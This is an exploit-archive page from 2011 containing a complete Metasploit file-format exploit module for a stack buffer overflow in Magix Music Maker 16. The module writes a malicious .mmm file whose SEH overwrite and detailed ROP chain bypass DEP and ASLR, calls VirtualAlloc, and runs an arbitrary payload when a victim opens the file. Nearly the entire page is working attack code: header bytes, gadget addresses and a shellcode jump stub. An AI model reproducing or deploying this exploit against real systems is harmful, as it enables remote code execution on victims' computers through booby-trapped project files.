Magix Musik Maker 16 .mmm Stack Buffer Overflow (w/o egg-hunter)

2011-05-27 14:15:03

---
My version of exploit...
Looks like bug the same as in:
http://www.exploit-db.com/exploits/17313/

My exploit does not use egg-hunter, so it must be faster, but i have limited size for payload -
750 bytes 8)
Speed Vs Size...
---
# Title: Magix Musik Maker 16
# EDB-ID: ()
# CVE-ID: ()
# OSVDB-ID: 72455
# Author: Alexey Sintsov
# Published: 2011-05-22
# Verified:
# Download N/A

##
# $Id: musick_maker16.rb 12364 2011-05-03 07:53:58Z aaa $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking

include Msf::Exploit::FILEFORMAT



def initialize(info = {})
super(update_info(info,
'Name' => 'Musick Maker 16, Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Musick Maker 16
When opening a malicious .MMM file in Music Maker, a stack buffer occurs,
resulting in arbitrary code execution via SEH.
This exploit bypasses DEP & ASLR and works on XP, Vista & Windows 7. LTKRN14n.dll and LTDIS14n.dll used for ROP.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Alexey Sintsov',

],
'Version' => '$Revision: 12364 $',
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'BadChars' => "\x00",
'DisableNops' => 'True',
},
'Platform' => 'win',
'Targets' =>
[
[ '32-bit Windows Universal (Generic DEP & ASLR Bypass)',
{
'Ret' => 0x20012026, # ADD ESP,4F8 # RETN 4
'Size' => 750
}
],
],
'Privileged' => false,
'DisclosureDate' => 'May 02 2011',
'DefaultTarget' => 0))

register_options(
[
OptString.new('FILENAME', [ true, 'The output file name.', 'msf.mmm']),

], self.class)
end

def exploit

badchars = target['BadChars']


print_status("Creating '#{datastore['FILENAME']}' file ...")
print_status("Preparing payload")

aaa_header="\x52\x49\x46\x46\xE6\x9D\x06\x00\x53\x45\x4B\x44\x53\x56\x49\x50"+
"\x10\x07\x00\x00\x9B\x5B\x6E\x00\x00\x00\x00\x00\x11\x00\x00\x00"+
"\x08\x00\x00\x00\x44\xAC\x00\x00\x11\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x39\x40\x00\x00\xF0\x42\x00\x00\x00\x00\xBD\x04\xEF\xFE"+
"\x00\x00\x01\x00\x00\x00\x10\x00\x06\x00\x00\x00\x00\x00\x10\x00"+
"\x06\x00\x00\x00\x3F\x00\x00\x00\x28\x00\x00\x00\x04\x00\x04\x00"+
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\xF3\x8E\x32\x01\xD0\x02\x00\x00\x40\x02\x00\x00\x55\x55\x55\x55"+
"\x55\x55\xF5\x3F\x10\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF"+
"\xFF\xFF\xFF\xFF"

aaa_list="\x4C\x49\x53\x54\x04\x25\x02\x00\x70\x68\x79\x73\x66\x69\x6C\x65\xF8\x08"

rop_pivot =
[
0x20012026, # ADD ESP,4F8 # RETN 4
].pack("V*")

rop_nop =
[
0x1FF727C6, # RETN
].pack("V*")

rop_jmp =
[
0x2001DD16, # ADD ESP, 40 # RETN
].pack("V*")

rop_gadgets2 =
[
0x1FFFB8D9, # XCHG EAX,EBP # RETN
0x1FF727C5, # POP ECX # RETN // ECX = FFFFFFFF
0xffffffff,
0x20048546, # ADC ECX,EBP # RETN // ECX - saved stack
0x1FFA82EF, # POP EAX # RETN
0x1FFAF154, # ----+ // [EAX+C] will point on VA
0x1FFFB8D9, # XCHG EAX,EBP # RETN // now [EBP+C] will point on VA
0x1FFA817E, # MOV EAX,DWORD PTR SS:[EBP+C] # POP EDI # POP ESI # POP EBX # POP EBP # RETN 0C
0xAAAAAAAA,
0xAAAAAAAA,
0xAAAAAAAA,
0xAAAAAAAA,
0x1FFFB8D9, # XCHG EAX,EBP # RETN
0xBBBBBBBB,
0xBBBBBBBB,
0xBBBBBBBB,
0x1FF72620, # MOV EAX,ECX # POP EBX # RETN
0xAAAAAAAA,
0x1FFFB8D9, # XCHG EAX,EBP # RETN // EBP - saved stack pointer
0x2004A8C1, # CALL EAX # RETN // call VirtAlloc
0x31313131, # // param 1
0x32323232, # // param 2
0x33333333, # // param 3
0x34343434, # // param 4
0x2001215B, # PUSH ESP # RETN 4
].pack("V*")

rop_gadgets =
[
0x1FFFB8D9, # XCHG EAX,EBP # RETN // Pointer in EAX
0x1FF95F45, # PUSH EAX # POP ESI # RETN 8 // Pointer in ESI an EAX
0x1FFA82EF, # POP EAX # RETN
0x11111111, # ^
0x22222222, # |
0xFFFFFc74, # ---+
0x200263f5, # NEG EAX # RETN // EAX = OFFSET
0x1FF74212, # ADD EAX,ESI # POP ESI # RETN // pointer in stack on our HEAP
0x33333333,
0x1FF939F2, # MOV EAX,DWORD PTR DS:[EAX+90] # RETN 4// EAX -> POINTER+OFFSET --- here are our params in HEAP
0x1FF95F45, # PUSH EAX # POP ESI # RETN 8 // EAX and ESI = POINTER+OFFSET --- here are our params in HEAP
0x44444444,
0x1FFFB8D9, # XCHG EAX,EBP # RETN // EBP = Pointer as param 1
0x44444444,
0x55555555,

0x1FF727C5, # POP ECX # RETN // ECX = ffffff10
0xffffff10,
0x20048546, # ADC ECX,EBP # RETN // ECX = Pointer on stack - as param 1
0x2003C7AD, # MOV EAX,ESI # POP ESI # RETN // EAX=PARAMS POINTER
0x66666666,
0x1FF95F45, # PUSH EAX # POP ESI # RETN 8 // resave in ESI
0x1FF891C4, # MOV DWORD PTR DS:[EAX+4],ECX # RETN // WRITE PARAM 1 - pointer on stack
0x77777777,
0x88888888,

0x1FFA883A, # XOR EAX,EAX # RETN
0x1FF7519F, # ADD AL,40 # RETN // EAX=40
0x1FFFB8D9, # XCHG EAX,EBP # RETN // EBP = 40
0x1FF727C5, # POP ECX # RETN // ECX = ffffffd0
0xffffffd0,
0x20048546, # ADC ECX,EBP # RETN // ECX = 10
0x2003C7AD, # MOV EAX,ESI # POP ESI # RETN // EAX=PARAMS POINTER
0x99999999,
0x1FF95F45, # PUSH EAX # POP ESI # RETN 8 // resave in ESI
0x1FF9EAF7, # MOV DWORD PTR DS:[EAX+8],ECX # RETN // WRITE PARAM 2 - size(10)
0xaaaaaaaa,
0xbbbbbbbb,

0x1FFA82EF, # POP EAX # RETN // EAX = FFFFEFFF
0xffffefff,
0x200263f5, # NEG EAX # RETN // EAX=1001 (cos 1000 with null bytes)
0x1FFA0231, # DEC EAX # RETN // EAX=1000
0x1FFFB8D9, # XCHG EAX,EBP # RETN // EBP = 1000
0x1FF727C5, # POP ECX # RETN // ECX = FFFFFFFF
0xffffffff,
0x20048546, # ADC ECX,EBP # RETN // ECX = 1000 - MEM_COMMIT
0x2003C7AD, # MOV EAX,ESI # POP ESI # RETN // EAX=PARAMS POINTER
0xcccccccc,
0x1FF751A0, # INC EAX # RETN
0x1FF751A0, # INC EAX # RETN
0x1FF751A0, # INC EAX # RETN
0x1FF751A0, # INC EAX # RETN
0x1FF751A0, # INC EAX # RETN
0x1FF751A0, # INC EAX # RETN
0x1FF751A0, # INC EAX # RETN
0x1FF751A0, # INC EAX # RETN
0x1FF95F45, # PUSH EAX # POP ESI # RETN 8 // resave in ESI
0x1FF891C4, # MOV DWORD PTR DS:[EAX+4],ECX # RETN // WRITE PARAM 3 - MEM_COMMIT
0xdddddddd,
0xdddddddd,

0x1FF727C5, # POP ECX # RETN // ECX = ffffffFF
0xffffffff,
0x20033FB9, # INC ECX # ADD AL,3 # RETN // ECX=0
0x1FFA883A, # XOR EAX,EAX # RETN
0x1FF7519F, # ADD AL,40 # RETN // EAX=40
0x1FFFB8D9, # XCHG EAX,EBP # RETN // EBP = 40
0x20048546, # ADC ECX,EBP # RETN // ECX = 40
0x2003C7AD, # MOV EAX,ESI # POP ESI # RETN // EAX=PARAMS POINTER
0xeeeeeeee,
0x1FF9EAF7, # MOV DWORD PTR DS:[EAX+8],ECX # RETN // WRITE PARAM 4 - WRITE_EXECUTE
0x1FF727C5, # POP ECX # RETN
0xFFFFFFAC, # -84 -^
0x1FF75190, # ADD EAX,ECX # RETN EAX=EAX-84
0x2004387F, # XCHG EAX,ESP # RETN // New stack pointer in HEAP-------->rop_gadgets2

].pack("V*")

#Jump to shellcode
shell_jmp="\x87\xe5"+ # XCHG ESP, EBP <---- take back stack pointer
"\x33\xc0"+ # XOR EAX, EAX
"\x04\x40"+ # ADD AL, 40
"\x50"+ # PUSH EAX
"\x33\xc0"+ # XOR EAX, EAX
"\xb4\x10"+ # MOV AH, 10
"\x50"+ # PUSH EAX
"\x8b\xc5"+ # MOV EAX, EBP
"\x33\xc9"+ # XOR ECX,ECX
"\xb5\x05"+ # MOV CH, 5
"\xb1\xee"+ # MOV CL, EE
"\x2b\xc1"+ # SUB EAX, ECX <--- block with shellcode
"\x51"+ # PUSH ECX
"\x50"+ # PUSH EAX
"\x8b\xf8"+ # MOV EDI, EAX
"\xb9\x60\xf1\xfa\x1f"+ # MOV ECX, 1FFAF160
"\xff\x11"+ # CALL [ECX] -> call kenrnel32.VirtualAlloc(shellcode,0x826,MEM_COMMIT,READWRITE_EXECUTE)
"\xff\xe7" # JMP EDI -> JMP shellcode

pivot = [target.ret].pack('V')

shellcode=payload.encoded

nops = make_nops(8)

aaa_data = aaa_header
aaa_data << "\x00"*1680
aaa_data << aaa_list
aaa_data << "\x00"*25

#### This will be in heap, not in the stack
aaa_data << "C:\\aaa\\"
aaa_data << shellcode # 7. Shellcode run
aaa_data << "a"*(target['Size']-shellcode.length)

aaa_data << "a"*328

aaa_data << "\x00"*16


aaa_data << "x"*320
aaa_data << rop_gadgets2 # 4. call VirtualAlloc, jmp to ESP (5.)
aaa_data << shell_jmp # 5. call VA again and JMP to shellcode (6.)
aaa_data << "a"*61

#### And this will be in stack!
aaa_data << rop_jmp*32 # 2. After satck pivot, jump to (3.)
aaa_data << "a"*16
aaa_data << [target.ret].pack('V') # 1. SEH rewrite -> ADD ESP, xxx and we are in (2.)
aaa_data << rop_nop*10 # 3. ROP-NOP
aaa_data << rop_gadgets # 4. ROP programm, calc in HEAP and make new stack (4.)
aaa_data << "a"*31337 # truncated

print_status("Writing payload to file, " + aaa_data.length.to_s()+" bytes")

if shellcode.length>target['Size']
print_status("ERROR, too big payload!")
else
file_create(aaa_data)
end
end
end

Fixes

No fixes

In order to submit a new fix you need to be registered.